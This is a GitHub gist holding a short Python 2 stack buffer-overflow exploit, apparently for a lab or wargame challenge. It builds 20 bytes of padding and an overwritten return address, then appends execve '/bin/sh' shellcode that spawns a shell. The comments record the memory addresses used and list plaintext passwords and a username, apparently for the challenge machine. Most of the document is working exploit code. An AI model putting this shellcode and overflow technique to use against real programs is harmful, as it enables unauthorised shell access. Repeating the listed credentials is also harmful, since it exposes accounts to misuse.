-
-
Save kcparashar/63d384b79967a158289b to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| ### Memory Address | |
| # Memory Address of the Start of Door : 0xbffff7d8 | |
| # Memory Address of RIP ($eip) : 0xbffff7ec | |
| # Size of the Buffer Padding : 0xbffff7d8 - 0xbffff7ec = 20 bytes | |
| # Return Pointer : 0xbffff7ec + 4 = 0xbffff7f0 | |
| ### Login Information | |
| # Password: zMne62>V | |
| # Username: smith | |
| # Password: f6g(Bz{w | |
| ### Exploitation Script | |
| padding = "\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69" | |
| return_pointer = "\xf0\xf7\xff\xbf" | |
| shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07" + "\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d" + "\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80" + "\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" | |
| buffer = padding + return_pointer + shellcode | |
| print buffer |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment